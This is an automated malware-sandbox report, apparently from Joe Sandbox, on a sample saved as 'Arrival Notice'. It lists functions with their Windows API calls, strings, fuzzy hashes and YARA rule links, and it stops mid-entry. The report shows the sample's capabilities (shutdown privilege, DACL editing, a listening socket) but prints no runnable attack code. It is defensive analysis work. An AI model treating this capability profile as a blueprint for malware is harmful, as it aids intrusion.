Opcode Fuzzy Hash: 3f6b353810eac569563fedced8c2ead9a42502afb1b83146d3e6cee52cd4c640
Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
FindClose.KERNEL32(00000000), ref: 00478924
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
__swprintf.LIBCMT ref: 004789D3
__swprintf.LIBCMT ref: 00478A1D
__swprintf.LIBCMT ref: 00478A4B
__swprintf.LIBCMT ref: 00478A79

Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C

__swprintf.LIBCMT ref: 00478AA7
__swprintf.LIBCMT ref: 00478AD5
__swprintf.LIBCMT ref: 00478B03

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 004789CD
%4d, xrefs: 00478A17
%02d, xrefs: 00478A43, 00478A73, 00478AA1, 00478ACD, 00478AFD

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 999945258-2428617273
Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A

Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON

Download Yara Rule

APIs

Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57

GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
__wsplitpath.LIBCMT ref: 00403492

Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50

_wcscpy.LIBCMT ref: 004034A7
_wcscat.LIBCMT ref: 004034BC
SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651

Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41

_wcscpy.LIBCMT ref: 004035A0
_wcslen.LIBCMT ref: 00403623
_wcslen.LIBCMT ref: 0040367D

Strings

_, xrefs: 0040371C
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
Error opening the file, xrefs: 00428231
Unterminated string, xrefs: 00428348

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
API String ID: 3393021363-188983378
Opcode ID: 53dff83b94012ef351ff3a4ba62cb1d5079707a411f5b875e68a7705f3cab139
Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
Opcode Fuzzy Hash: 53dff83b94012ef351ff3a4ba62cb1d5079707a411f5b875e68a7705f3cab139
Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB

Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
GetFileAttributesW.KERNEL32(?), ref: 00431AE7
SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
FindClose.KERNEL32(00000000), ref: 00431B20
FindClose.KERNEL32(00000000), ref: 00431B34
FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
FindClose.KERNEL32(00000000), ref: 00431BCD
FindClose.KERNEL32(00000000), ref: 00431BDB

Strings

*.*, xrefs: 00431B4A

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9

Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
__swprintf.LIBCMT ref: 00431C2E
_wcslen.LIBCMT ref: 00431C3A
CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67

Strings

:, xrefs: 00431C4F
\??\%s, xrefs: 00431C28
\, xrefs: 00431C44

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CreateDirectoryFullNamePath__swprintf_wcslen
String ID: :$\$\??\%s
API String ID: 2192556992-3457252023
Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8

Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 004722A2
__swprintf.LIBCMT ref: 004722B9
SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC

Strings

%.3d, xrefs: 004722AD

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: FolderPath$LocalTime__swprintf
String ID: %.3d
API String ID: 3337348382-986655627
Opcode ID: 48c07388412e252f080c16643772a7d18a3b55828c11779c89d55816a2428872
Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
Opcode Fuzzy Hash: 48c07388412e252f080c16643772a7d18a3b55828c11779c89d55816a2428872
Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64

Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004428A8
FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
FindClose.KERNEL32(00000000), ref: 0044291C
FindClose.KERNEL32(00000000), ref: 00442930
FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
FindClose.KERNEL32(00000000), ref: 004429D4

Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A

FindClose.KERNEL32(00000000), ref: 004429E2

Strings

*.*, xrefs: 00442948

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8

Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
GetLastError.KERNEL32 ref: 00433414
ExitWindowsEx.USER32(?,00000000), ref: 00433437
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479

Strings

SeShutdownPrivilege, xrefs: 004333E3

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
String ID: SeShutdownPrivilege
API String ID: 2938487562-3733053543
Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765

Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75

Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
GetLengthSid.ADVAPI32(?), ref: 004461D0
GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
GetLengthSid.ADVAPI32(?), ref: 00446241
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
CopySid.ADVAPI32(00000000), ref: 00446271
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 1255039815-0
Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69

Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00433073
__swprintf.LIBCMT ref: 00433085
__wcsicoll.LIBCMT ref: 00433092
FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
LoadResource.KERNEL32(?,00000000), ref: 004330BD
LockResource.KERNEL32(00000000), ref: 004330CA
FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
LoadResource.KERNEL32(?,00000000), ref: 00433105
SizeofResource.KERNEL32(?,00000000), ref: 00433114
LockResource.KERNEL32(?), ref: 00433120

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
String ID:
API String ID: 1158019794-0
Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8

Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(?), ref: 0045A14A
EmptyClipboard.USER32 ref: 0045A150
CloseClipboard.USER32 ref: 0045A156
GlobalAlloc.KERNEL32(00000002,?,?,?), ref: 0045A176

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88

Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D627
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
GetLastError.KERNEL32 ref: 0045D6BF
SetErrorMode.KERNEL32(00000000,?), ref: 0045D751

Strings

NOTREADY, xrefs: 0045D704
INVALID, xrefs: 0045D6F5
READONLY, xrefs: 0045D713
READY, xrefs: 0045D6E6
UNKNOWN, xrefs: 0045D722

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69

Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044D011
_strncmp.LIBCMT ref: 0044EC1E
_memmove.LIBCMT ref: 0044ED08

Strings

\, xrefs: 0044D061
^, xrefs: 0044F41E
h, xrefs: 0044F78E
@oH, xrefs: 0044EC09

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmove$_strncmp
String ID: @oH$\$^$h
API String ID: 2175499884-3701065813
Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55

Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
WSAGetLastError.WSOCK32(00000000), ref: 0046531C
bind.WSOCK32(00000000,?,00000010), ref: 00465356
WSAGetLastError.WSOCK32(00000000), ref: 00465363
closesocket.WSOCK32(00000000,00000000), ref: 00465377
listen.WSOCK32(00000000,00000005), ref: 00465381
WSAGetLastError.WSOCK32(00000000), ref: 004653A9
closesocket.WSOCK32(00000000,00000000), ref: 004653BD

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
